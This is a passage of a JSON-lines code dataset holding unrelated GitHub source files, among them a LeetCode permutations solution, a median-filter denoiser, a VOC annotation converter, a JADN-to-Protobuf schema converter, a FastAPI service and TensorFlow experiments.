Q=\"queries/cophir-208.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n D=\"dbs/sift/ascii/sift_base\"\n Q=\"dbs/sift/ascii/sift_query-256.vecs\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n sys.exit(0)\n\n args[\"lc\"].append(32)\n D=\"dbs/vectors/nasa/nasa-20-40150\"\n Q=\"queries/nasa.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n args[\"lc\"].append(16)\n\n D=\"dbs/vectors/colors/colors-112-112682\"\n Q=\"queries/colors.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main_n(pool):\n args = dict(BASE_ARGS.items())\n\n for n in [100000, 300000, 1000000, 3000000]:\n for dim in [4, 12]:\n if dim == 4:\n args[\"lc\"] = [1024,512,256]\n else:\n args[\"lc\"] = [1024,512,256,128,64]\n D=\"dbs/vectors/random/db.random.%d.%d\" % (dim, n)\n Q=\"queries/random-%d.queries\" % dim\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main_dimension(pool):\n args = dict(BASE_ARGS.items())\n\n for dim in [4, 8, 12, 16, 20, 24]:\n n=1000000\n D=\"dbs/vectors/random/db.random.%d.%d\" % (dim, n)\n Q=\"queries/random-%d.queries\" % dim\n if dim >= 16:\n args[\"lc\"] = [128, 64, 32, 16]\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main():\n p = Pool(processes=16)\n main_real(p)\n main_n(p)\n main_dimension(p)\n p.close()\n p.join()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sadit/natix","sub_path":"utils/exp-exact.py","file_name":"exp-exact.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"71714990646","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Author: Yu Zhou\n\n# 46. Permutations\n# Given a collection of distinct numbers, return all possible permutations.\n\n\n\n# 思路\n# 基础地轨思路\n\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n self.res = []\n def dfs(nums, temp):\n if len(temp) == len(nums):\n self.res.append(temp[:])\n\n for i in xrange(len(nums)):\n if nums[i] in temp:\n continue\n temp.append(nums[i])\n dfs(nums, temp)\n temp.pop()\n dfs(nums, [])\n return self.res\n \n","repo_name":"tech-cow/leetcode","sub_path":"backtrack/Yu/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1339,"dataset":"github-code","pt":"76"} +{"seq_id":"25869285487","text":"from xml.etree import ElementTree as ET\n\nfixlet = \"\"\"\n\n\t\n\t\n\n\"\"\"\n\nfixletaction = \"\"\"\n\n \n Click \n here\n \n \n \n\n\"\"\"\n\ndef createFixlet(id, title, description, relevance, actions, parameters, MIMEfields):\n t = ET.ElementTree(ET.fromstring(fixlet))\n f = t.getroot()[0]\n \n node = ET.Element(\"Title\")\n node.text = title\n f.append(node)\n \n node = ET.Element(\"Description\")\n lines = \"\"\n for line in description:\n lines += line + \"\\n\"\n node.text = lines\n f.append(node)\n\n for expression in relevance:\n node = ET.Element(\"Relevance\")\n node.text = expression\n f.append(node)\n\n #parameters\n for (key, value) in parameters.items():\n node = ET.Element(key)\n node.text = value\n f.append(node)\n\n for MIME in MIMEfields:\n f.append(MIME)\n \n for action in actions:\n f.append(action)\n \n t.write(str(id) + \" - \" + title + \".bes\")\n \ndef createAction(ID, postLink, action):\n a = ET.fromstring(fixletaction)\n a.set('ID', ID)\n node = a.find(\"Description\")\n node.find(\"PostLink\").text = postLink\n node = a.find(\"ActionScript\")\n lines = \"\"\n for line in action:\n lines += line + \"\\n\"\n node.text = lines\n return a","repo_name":"bigfix/iemcog","sub_path":"contentgenerator.py","file_name":"contentgenerator.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39539612562","text":"#Map Functuion........\ndef shamim(a):\n return a*a\n\n#map function first use function, iterable value like list.......\nval = [10,20, 30, 40, 50]\ncollect = list(map(shamim, val))\nprint(collect)\n\n\n#Filter Function........\n\nnum = [5,11,23,30,40,50]\n\nresult = list(filter(lambda x : x%2==0, num))\nprint(result)\n\n#Ex.............................................\nnum = [5,11,23,30,40,50]\n\nfor i in num:\n print(\"loop result : \", i*i)\n\nresult = (lambda x : x%2==0)(5)\nprint(result)","repo_name":"CodeWithShamim/python-t-code","sub_path":"Function_/Map and Filter Fucntion.py","file_name":"Map and Filter Fucntion.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70103275767","text":"import cv2\nimport sys\nimport numpy as np\nimport heapq\nfrom display_utils import side_by_side, Tagged, Spacer, Vertical, Horizontal\n\ndef mfilter(data, filter_size):\n indexer = filter_size // 2\n window = [\n (i, j)\n for i in range(-indexer, filter_size-indexer)\n for j in range(-indexer, filter_size-indexer)\n ]\n index = len(window) // 2\n d = data.shape[1]\n s = data.shape[0]\n for i in range(data.shape[0]):\n for j in range(d):\n data[i,j] = heapq.nsmallest(index+1,\n (0 if (\n min(i+a, j+b) < 0\n or s <= i+a\n or d <= j+b\n ) else data[i+a, j+b]\n for a, b in window)\n )[index]\n return data\n\nimage = cv2.imread(sys.argv[1] if len(sys.argv) > 1 else 'test.png')\n\nhow_much_spice = float(sys.argv[2] if len(sys.argv) > 2 else 0.06)\nhow_much_blur = int(sys.argv[3] if len(sys.argv) > 3 else 3)\nrgb_spice = True # False for true \"Pepper and Salt\"\n\nnoisy = np.copy(image)\n\nif rgb_spice:\n noise = np.random.rand(*image.shape) * 255\n noise = noise < (255 * how_much_spice)\n noisy[noise] = 255\nelse:\n black = noise < (255 * how_much_spice)\n white = noise > (255 * (1 - how_much_spice))\n noisy[black] = [0,0,0]\n noisy[white] = [255,255,255]\n\n\n## cv2 denoise\ncv_denoise = cv2.medianBlur(noisy, how_much_blur)\n\n## manual denoise\ndenoise = np.copy(noisy)\ndenoise[:,:,0] = mfilter(denoise[:,:,0], how_much_blur)\ndenoise[:,:,1] = mfilter(denoise[:,:,1], how_much_blur)\ndenoise[:,:,2] = mfilter(denoise[:,:,2], how_much_blur)\n\ncv2.imshow('result', side_by_side(\n Tagged('Median Filter Denoise - AliMPFard', Vertical(\n Spacer(40),\n Horizontal(\n Tagged('Original', 0, fill='rgb(0,0,255)'),\n Spacer(image.shape[1] // 15),\n Tagged('Noisy', 1, fill='rgb(0,0,255)')\n ),\n Spacer(image.shape[0] // 15),\n Horizontal(\n Tagged('CV2', 2, fill='rgb(0,0,255)'),\n Spacer(image.shape[1] // 15),\n Tagged('Mine', 3, fill='rgb(0,0,255)')\n )\n ), fill='#a0736c'),\n image,\n noisy,\n cv_denoise,\n denoise)\n)\n\nwhile cv2.waitKey(0) != ord('q'):\n pass\n\ncv2.destroyAllWindows()\n","repo_name":"alimpfard/image-processing-stuff","sub_path":"noise_denoise.py","file_name":"noise_denoise.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20913224108","text":"import os\r\nfrom os import getcwd\r\nimport xml.etree.ElementTree as ET\r\n\r\n\r\ntrain_image_path = './trainval/VOCdevkit/VOC2012/JPEGImages/'\r\ntrain_xml_path = './trainval/VOCdevkit/VOC2012/Annotations/'\r\n\r\n#test_image_path = './test/VOCdevkit/VOC2007/JPEGImages/'\r\n#test_xml_path = './test/VOCdevkit/VOC2007/Annotations/'\r\n\r\ntrainval_file = 'trainval_set_2012.txt'\r\n#test_file = 'test_set.txt'\r\n\r\n\r\ntrain_image_directory = os.listdir(train_image_path)\r\ntrain_images = [train_image_path + image for image in train_image_directory]\r\n\r\ntrain_xml_directory = os.listdir(train_xml_path)\r\ntrain_xmls = [train_xml_path + xml for xml in train_xml_directory]\r\n\r\n#test_image_directory = os.listdir(test_image_path)\r\n#test_images = [test_image_path + image for image in test_image_directory]\r\n\r\n#test_xml_directory = os.listdir(test_xml_path)\r\n#test_xmls = [test_xml_path + xml for xml in test_xml_directory]\r\n\r\nworking_directory = getcwd()\r\n\r\n\r\nclasses = [\"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n\r\ndef processing_dataset(image_fullname, xml_fullname, file_name):\r\n xml_file = open(xml_fullname)\r\n tree = ET.parse(xml_file)\r\n root = tree.getroot()\r\n row = \"\"\r\n \r\n for obj in root.findall('object'):\r\n name = obj.find('name').text\r\n if name not in classes:\r\n continue\r\n \r\n class_id = classes.index(name)\r\n bndbox = obj.find('bndbox')\r\n xmin = bndbox.find('xmin').text\r\n ymin = bndbox.find('ymin').text\r\n xmax = bndbox.find('xmax').text\r\n ymax = bndbox.find('ymax').text\r\n \r\n row = row + \" \" + str(xmin) + \",\" + str(ymin) + \",\" + str(xmax) + \",\" + str(ymax) + \",\" + str(class_id)\r\n \r\n if row != \"\":\r\n list_file = open(file_name, 'a')\r\n file_string = working_directory + str(image_fullname)[1:] + row + '\\n'\r\n list_file.write(file_string)\r\n list_file.close()\r\n\r\n\r\nfor i in range(len(train_xmls)):\r\n train_image_fullname = train_images[i]\r\n train_xml_fullname = train_xmls[i]\r\n processing_dataset(train_image_fullname, train_xml_fullname, trainval_file)\r\n \r\n \r\n\r\n#for j in range(len(test_xmls)):\r\n# test_image_fullname = test_images[j]\r\n# test_xml_fullname = test_xmls[j]\r\n# processing_dataset(test_image_fullname, test_xml_fullname, test_file)","repo_name":"nihan139/Real-Time-Object-Detection-for-Blind-People","sub_path":"YOLOV3/processing_data_from_xml.py","file_name":"processing_data_from_xml.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34263086104","text":"import timeit\n\ndeclaration_1 = \"\"\"\nfor_test(10)\n\"\"\"\n\nsetup_1 = \"\"\"\ndef for_test(number):\n my_list = []\n for num in range(1, number + 1):\n my_list.append(num)\n return my_list\n\"\"\"\n\ndeclaration_2 = \"\"\"\nwhile_test(10)\n\"\"\"\n\nsetup_2 = \"\"\"\ndef while_test(number):\n my_list = []\n counter = 1\n while counter <= number:\n my_list.append(counter)\n counter += 1\n return my_list\n\"\"\"\n\nlength_1 = timeit.timeit(declaration_1, setup_1, number=1000000)\nlength_2 = timeit.timeit(declaration_2, setup_2, number=1000000)\n\nprint(length_1)\nprint(length_2)\n\n","repo_name":"Afreen89/16-projects-in-Python","sub_path":"Day9/measure_time2.py","file_name":"measure_time2.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4332647839","text":"import json\nimport re\n\nfrom datetime import datetime\n\nfrom ..codec.codec_utils import fopts_s2d, topts_s2d\nfrom ..utils import Utils\n\n\nclass JADNtoProto3(object):\n def __init__(self, jadn):\n \"\"\"\n Schema Converter for JADN to ProtoBuf3\n :param jadn: str or dict of the JADN schema\n :type jadn: str or dict\n \"\"\"\n if type(jadn) is str:\n try:\n jadn = json.loads(jadn)\n except Exception as e:\n raise e\n elif type(jadn) is dict:\n pass\n\n else:\n raise TypeError('JADN improperly formatted')\n\n self.indent = ' '\n\n self._fieldMap = {\n 'Binary': 'string',\n 'Boolean': 'bool',\n 'Integer': 'int64',\n 'Number': 'string',\n 'Null': 'string',\n 'String': 'string'\n }\n self._structFormats = {\n 'Record': self._formatRecord,\n 'Choice': self._formatChoice,\n 'Map': self._formatMap,\n 'Enumerated': self._formatEnumerated,\n 'Array': self._formatArray,\n 'ArrayOf': self._formatArrayOf,\n }\n\n self._imports = []\n self._meta = jadn['meta'] or []\n self._types = []\n self._custom = []\n self._customFields = [] # [t[0] for t in self._types]\n\n for t in jadn['types']:\n if t[1] in self._structFormats.keys():\n self._types.append(t)\n self._customFields.append(t[0])\n else:\n self._custom.append(t)\n\n def proto_dump(self):\n \"\"\"\n Converts the JADN schema to Protobuf3\n :return: Protobuf3 schema\n :rtype str\n \"\"\"\n return '{header}{imports}{defs}\\n/* JADN Custom Fields\\n[\\n{jadn_fields}\\n]\\n*/'.format(\n idn=self.indent,\n header=self.makeHeader(),\n defs=self.makeStructures(),\n imports=''.join(['import \\\"{}\\\";\\n'.format(i) for i in self._imports]),\n jadn_fields=',\\n'.join([self.indent+json.dumps(f) for f in Utils.defaultDecode(self._custom)])\n )\n\n def formatStr(self, s):\n \"\"\"\n Formats the string for use in schema\n :param s: string to format\n :type s: str\n :return: formatted string\n :rtype str\n \"\"\"\n if s == '*':\n return 'unknown'\n else:\n return re.sub(r'[\\- ]', '_', s)\n\n def makeHeader(self):\n \"\"\"\n Create the header for the schema\n :return: header for schema\n :rtype str\n \"\"\"\n header = list([\n 'syntax = \"proto3\";',\n '',\n 'package {};'.format(re.sub(r'[.\\-/]+', '_', self._meta['module']) or 'JADN_ProtoBuf_Schema'),\n '',\n '/*'\n ])\n\n header.extend([' * meta: {} - {}'.format(k, re.sub(r'(^\\\"|\\\"$)', '', json.dumps(Utils.defaultDecode(v)))) for k, v in self._meta.items()])\n\n header.append('*/')\n\n return '\\n'.join(header) + '\\n\\n'\n\n def makeStructures(self):\n \"\"\"\n Create the type definitions for the schema\n :return: type definitions for the schema\n :rtype str\n \"\"\"\n tmp = ''\n for t in self._types:\n df = self._structFormats.get(t[1], None)\n\n if df is not None and t[1] in ['Record', 'Enumerated', 'Map', 'Array', 'ArrayOf']:\n tmp += df(t)\n\n elif df is not None:\n tmp += self._wrapAsRecord(df(t))\n\n return tmp\n\n def _wrapAsRecord(self, itm):\n \"\"\"\n wraps the given item as a record for the schema\n :param itm: item to wrap\n :type s: str\n :return: item wrapped as a record for hte schema\n :rtype str\n \"\"\"\n lines = itm.split('\\n')[1:-1]\n if len(lines) > 1:\n n = re.search(r'\\s[\\w\\d\\_]+\\s', lines[0]).group()[1:-1]\n tmp = \"\\nmessage {} {{\\n\".format(self.formatStr(n))\n for l in lines:\n tmp += '{}{}\\n'.format(self.indent, l)\n tmp += '}\\n'\n return tmp\n return ''\n\n def _fieldType(self, f):\n \"\"\"\n Determines the field type for the schema\n :param f: current type\n :return: type mapped to the schema\n :rtype str\n \"\"\"\n rtn = 'string'\n if re.search(r'(datetime|date|time)', f):\n if 'google/protobuf/timestamp.proto' not in self._imports:\n self._imports.append('google/protobuf/timestamp.proto')\n rtn = 'google.protobuf.Timestamp'\n\n if f in self._customFields:\n rtn = self.formatStr(f)\n\n elif f in self._fieldMap.keys():\n rtn = self.formatStr(self._fieldMap.get(f, f))\n return rtn\n\n def _formatComment(self, msg, **kargs):\n com = '//'\n if msg not in ['', None, ' ']:\n com += ' {msg}'.format(msg=msg)\n\n for k, v in kargs.items():\n com += ' #{k}:{v}'.format(\n k=k,\n v=json.dumps(v)\n )\n return com\n\n # Structure Formats\n def _formatRecord(self, itm):\n \"\"\"\n Formats records for the given schema type\n :param itm: record to format\n :return: formatted record\n :rtype str\n \"\"\"\n lines = []\n for l in itm[-1]:\n opts = {'type': l[2]}\n if len(l[-2]) > 0: opts['options'] = fopts_s2d(l[-2])\n\n lines.append('{idn}{type} {name} = {num}; {com}\\n'.format(\n idn=self.indent,\n type=self._fieldType(l[2]),\n name=self.formatStr(l[1]),\n num=l[0],\n com=self._formatComment('' if l[-1] == '' else l[-1], jadn_opts=opts)\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\nmessage {name} {{ {com}\\n{req}}}\\n'.format(\n name=self.formatStr(itm[0]),\n req=''.join(lines),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts)\n )\n\n def _formatChoice(self, itm):\n \"\"\"\n Formats choice for the given schema type\n :param itm: choice to format\n :return: formatted choice\n :rtype str\n \"\"\"\n lines = []\n for l in itm[-1]:\n opts = {'type': l[2]}\n if len(l[-2]) > 0: opts['options'] = fopts_s2d(l[-2])\n\n lines.append('{idn}{type} {name} = {num}; {com}\\n'.format(\n idn=self.indent,\n type=self._fieldType(l[2]),\n name=self.formatStr(l[1]),\n num=l[0],\n com=self._formatComment('' if l[-1] == '' else l[-1], jadn_opts=opts)\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\noneof {name} {{ {com}\\n{req}}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts),\n req=''.join(lines)\n )\n\n def _formatMap(self, itm):\n \"\"\"\n Formats map for the given schema type\n :param itm: map to format\n :return: formatted map\n :rtype str\n \"\"\"\n return self._formatRecord(itm)\n\n def _formatEnumerated(self, itm):\n \"\"\"\n Formats enum for the given schema type\n :param itm: enum to format\n :return: formatted enum\n :rtype str\n \"\"\"\n lines = []\n default = True\n for l in itm[-1]:\n if l[0] == 0: default = False\n lines.append('{idn}{name} = {num}; {com}\\n'.format(\n idn=self.indent,\n name=self.formatStr(l[1] or 'Unknown_{}_{}'.format(self.formatStr(itm[0]), l[0])),\n num=l[0],\n com='' if l[-1] == '' else self._formatComment(l[-1])\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\nenum {name} {{ {com}\\n{default}{enum}}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts),\n default='{}Unknown_{} = 0; // required starting enum number for protobuf3\\n'.format(self.indent, itm[0].replace('-', '_')) if default else '',\n enum=''.join(lines)\n )\n\n def _formatArray(self, itm): # TODO: what should this do??\n \"\"\"\n Formats array for the given schema type\n :param itm: array to format\n :return: formatted array\n :rtype str\n \"\"\"\n print('Array: {}'.format(itm))\n return ''\n\n def _formatArrayOf(self, itm): # TODO: what should this do??\n \"\"\"\n Formats arrayof for the given schema type\n :param itm: arrayof to format\n :return: formatted arrayof\n :rtype str\n \"\"\"\n\n opts = {\n 'type': 'arrayOf',\n 'options': topts_s2d(itm[2])\n }\n \n return '\\nmessage {name} {{\\n{idn}repeated {type} {field} = 1; {com}\\n}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n type=self.formatStr(opts['options']['rtype']),\n field=self.formatStr(opts['options']['rtype']).lower(),\n com=self._formatComment('' if itm[-1] == '' else itm[-1], jadn_opts=opts)\n )\n\n\ndef proto_dumps(jadn):\n \"\"\"\n Produce Protobuf3 schema from JADN schema\n :arg jadn: JADN Schema to convert\n :type jadn: str or dict\n :return: Protobuf3 schema\n :rtype str\n \"\"\"\n return JADNtoProto3(jadn).proto_dump()\n\n\ndef proto_dump(jadn, fname, source=\"\"):\n with open(fname, \"w\") as f:\n if source:\n f.write(\"-- Generated from \" + source + \", \" + datetime.ctime(datetime.now()) + \"\\n\\n\")\n f.write(proto_dumps(jadn))\n","repo_name":"shiguangcheng/openc2-jadn-software","sub_path":"jadn/libs/convert/w_proto.py","file_name":"w_proto.py","file_ext":"py","file_size_in_byte":9959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"10328854141","text":"from settings import get_settings\nfrom bson.objectid import ObjectId\nimport pydantic\nimport uvicorn\nimport os\nfrom colorama import Fore\nfrom fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom uvicorn.config import LOGGING_CONFIG\n\nfrom database import close_db, connect_db\nfrom routers import executable, task, vm, error\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(executable.router)\napp.include_router(task.router)\napp.include_router(vm.router)\napp.include_router(error.router)\n\napp.mount(\n \"/executables\",\n StaticFiles(directory=get_settings().upload_directory),\n name=\"executable files\",\n)\n\n\n# https://github.com/encode/uvicorn/blob/master/uvicorn/config.py#L86\n# https://docs.python.org/3/library/logging.config.html#user-defined-objects\nLOGGING_CONFIG[\"filters\"] = {\"logendpointfilter\": {\"()\": \"logs.LogEndpointFilter\"}}\n# Override fastapi's formatters to use our pretty format\nLOGGING_CONFIG[\"formatters\"] = {\n \"default\": {\n \"()\": \"uvicorn.logging.DefaultFormatter\",\n \"fmt\": \"[%(asctime)s] <\"\n + Fore.CYAN\n + \"uvicorn\"\n + Fore.RESET\n + \">: %(message)s\",\n \"use_colors\": None,\n \"datefmt\": \"%H:%M:%S\",\n },\n \"access\": {\n \"()\": \"uvicorn.logging.AccessFormatter\",\n \"fmt\": \"[%(asctime)s] <\"\n + Fore.CYAN\n + \"http\"\n + Fore.RESET\n + '>: %(client_addr)s - \"%(request_line)s\" %(status_code)s',\n \"datefmt\": \"%H:%M:%S\",\n },\n}\nLOGGING_CONFIG[\"handlers\"][\"access\"][\"filters\"] = [\"logendpointfilter\"]\n\n\npydantic.json.ENCODERS_BY_TYPE[ObjectId] = str\n\n\n@app.get(\"/\")\nasync def root():\n return {\"hello\": \"world\"}\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await connect_db()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await close_db()\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", log_config=LOGGING_CONFIG)\n","repo_name":"TechSupportJosh/piav","sub_path":"api/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5358535689","text":"import requests\nimport xmltodict\n\nfrom study202208.practice.test import jiami\nclass TestApiRequest():\n req_data = {\n \"method\": \"get\",\n \"url\": \"http://127.0.0.1:9999/demo.txt\",\n \"headers\": None,\n \"encoding\": \"base64\"\n }\n def test_send(self):\n ar=jiami.ApiRequest()\n print(ar.send(self.req_data))\n\n def test_xml_to_dict(self):\n ar = jiami.ApiRequest()\n res=requests.get(\"https://www.nasa.gov/rss/dyn/lg_image_of_the_day.rss\")\n final_res=ar.response_to_dict(res)\n assert isinstance(final_res,dict)\n","repo_name":"Jocelin123/study202208","sub_path":"study202208/practice/test/test_jiami.py","file_name":"test_jiami.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7812044482","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport h5py, os\n\n\nrun_type = 'no_init'\nif run_type == 'init':\n var = tf.Variable(tf.random_uniform([2, 3]), name=\"var\")\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n print(sess.run(var))\n print(sess.run(init))\nif 1==0:\n def open_dataset(out_list, path, name, train_size, valid_size, test_size):\n usage = 'training'\n batch_size = 64\n sequence_length = 16\n\n # open dataset file\n _hdf5_file = h5py.File(os.path.join(path, name + '.h5'), 'r')\n _data_in_file = {\n data_name: _hdf5_file[usage][data_name] for data_name in out_list\n }\n limit = ({'training': train_size, 'validation': valid_size, 'test': test_size}[usage] or\n _data_in_file['features'].shape[1])\n\n # fix shapes and datatypes\n input_seq_len = 1 if _data_in_file['features'].shape[0] == 1 else sequence_length\n shapes = {\n data_name: (input_seq_len, batch_size, 1) + _data_in_file[data_name].shape[-3:]\n for data_name, data in _data_in_file.items()\n }\n shapes['idx'] = ()\n _dtypes = {data_name: tf.float32 for data_name in out_list}\n _dtypes['idx'] = tf.int32\n\n # set up placeholders for inserting data into queue\n _data_in = {\n data_name: tf.placeholder(_dtypes[data_name], shape=shape)\n for data_name, shape in shapes.items()\n }\n\n k = get_feed_data(_data_in, _data_in_file, sequence_length, start_idx=0)\n\n print(k)\n\n def get_feed_data(_data_in, _data_in_file, sequence_length, start_idx):\n batch_size = 64\n feed_dict = {_data_in[data_name]: ds[:sequence_length, start_idx:start_idx + batch_size][:, :, None]\n for data_name, ds in _data_in_file.items()}\n feed_dict[_data_in['idx']] = start_idx\n return feed_dict\n open_dataset(out_list= ('features', 'groups'), path = './data', name = 'shapes', train_size = None, valid_size=1000, test_size = None)\n\nif 1==0:\n class InputPipeLine(object):\n def _open_dataset(self, out_list, path, name, train_size, valid_size, test_size):\n # open dataset file\n self._hdf5_file = h5py.File(os.path.join(path, name + '.h5'), 'r')\n self._data_in_file = {\n data_name: self._hdf5_file[self.usage][data_name] for data_name in out_list\n }\n self.limit = ({'training': train_size, 'validation': valid_size, 'test': test_size}[self.usage] or\n self._data_in_file['features'].shape[1])\n\n # fix shapes and datatypes\n input_seq_len = 1 if self._data_in_file['features'].shape[0] == 1 else self.sequence_length\n self.shapes = {\n data_name: (input_seq_len, self.batch_size, 1) + self._data_in_file[data_name].shape[-3:]\n for data_name, data in self._data_in_file.items()\n }\n self.shapes['idx'] = ()\n self._dtypes = {data_name: tf.float32 for data_name in out_list}\n self._dtypes['idx'] = tf.int32\n\n # set up placeholders for inserting data into queue\n self._data_in = {\n data_name: tf.placeholder(self._dtypes[data_name], shape=shape)\n for data_name, shape in self.shapes.items()\n }\n\n\n def __init__(self, usage, shuffle, batch_size, sequence_length, queue_capacity, _rnd, out_list=('features', 'groups')):\n self.usage = usage\n self.shuffle = shuffle\n self.sequence_length = sequence_length\n self.batch_size = batch_size\n self._rnd = _rnd\n self.samples_cache = {}\n\n with tf.name_scope(\"{}_queue\".format(usage[:5])):\n\n self._open_dataset(out_list)\n\n # set up queue\n self.queue = tf.FIFOQueue(capacity=queue_capacity,\n dtypes=[v for k, v in sorted(self._dtypes.items(), key=lambda x: x[0])],\n shapes=[v for k, v in sorted(self.shapes.items(), key=lambda x: x[0])],\n names=[k for k in sorted(self._dtypes)])\n\n self._enqueue_op = self.queue.enqueue(self._data_in)\n\n # set up outputs of queue (inputs for the model)\n self.output = self.queue.dequeue()\n if self.shapes['features'][0] == 1 and self.sequence_length > 1:\n # if the dataset has sequence length 1 we need to repeat the data\n reshaped_output = {data_name: tf.tile(self.output[data_name], [self.sequence_length, 1, 1, 1, 1, 1])\n for data_name in out_list}\n reshaped_output['idx'] = self.output['idx']\n self.output = reshaped_output\n\n def get_feed_data(self, start_idx):\n feed_dict = {self._data_in[data_name]: ds[:self.sequence_length, start_idx:start_idx + self.batch_size][:, :, None]\n for data_name, ds in self._data_in_file.items()}\n feed_dict[self._data_in['idx']] = start_idx\n return feed_dict\n\n def get_debug_samples(self, samples_list, out_list=None):\n samples_key = tuple(samples_list)\n if samples_key in self.samples_cache:\n return self.samples_cache[samples_key]\n\n out_list = self._data_in_file.keys() if out_list is None else out_list\n results = {}\n for data_name in out_list:\n data = self._hdf5_file[self.usage][data_name][:, samples_list][:, :, None]\n if data.shape[0] == 1 and self.sequence_length > 1:\n data = np.repeat(data, self.sequence_length, axis=0)\n elif data.shape[0] > self.sequence_length:\n data = data[:self.sequence_length]\n results[data_name] = data\n\n self.samples_cache[samples_key] = results\n return results\n\n def get_batch_start_indices(self):\n idxs = np.arange(0, self.limit - self.batch_size, step=self.batch_size)\n if self.shuffle:\n self._rnd.shuffle(idxs)\n return 0, idxs\n\n def enqueue(self, session, coord):\n i, idxs = self.get_batch_start_indices()\n try:\n while not coord.should_stop():\n if i >= len(idxs):\n i, idxs = self.get_batch_start_indices()\n session.run(self._enqueue_op, feed_dict=self.get_feed_data(idxs[i]))\n i += 1\n except Exception as e:\n coord.request_stop(e)\n finally:\n self._hdf5_file.close()\n\n def get_n_batches(self):\n return self.limit // self.batch_size\n\n\nif 1==0:\n features = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\n department_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\n department_column = tf.feature_column.indicator_column(department_column)\n\n columns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n ]\n\n inputs = tf.feature_column.input_layer(features, columns)\n\n var_init = tf.global_variables_initializer()\n table_init = tf.tables_initializer()\n sess = tf.Session()\n result = sess.run((var_init, table_init))\n result = sess.run(inputs)\n print(result)\n\nif 1==0:\n x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32)\n y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32)\n\n # linear_model = tf.layers.dense(inputs=1, units=1)\n # y_pred = linear_model(x)\n y_pred = tf.layers.dense(inputs=x, units=1)\n loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n init = tf.global_variables_initializer()\n\n sess = tf.Session()\n sess.run(init)\n for i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n print(sess.run(y_pred))\n\nif 1==1:\n tf.logging.set_verbosity(tf.logging.INFO)\n\n\n def cnn_model_fn(features, labels, mode):\n \"\"\"Model function for CNN.\"\"\"\n # Input Layer\n # Reshape X to 4-D tensor: [batch_size, width, height, channels]\n # MNIST images are 28x28 pixels, and have one color channel\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n # Computes 32 features using a 5x5 filter with ReLU activation.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 28, 28, 1]\n # Output Tensor Shape: [batch_size, 28, 28, 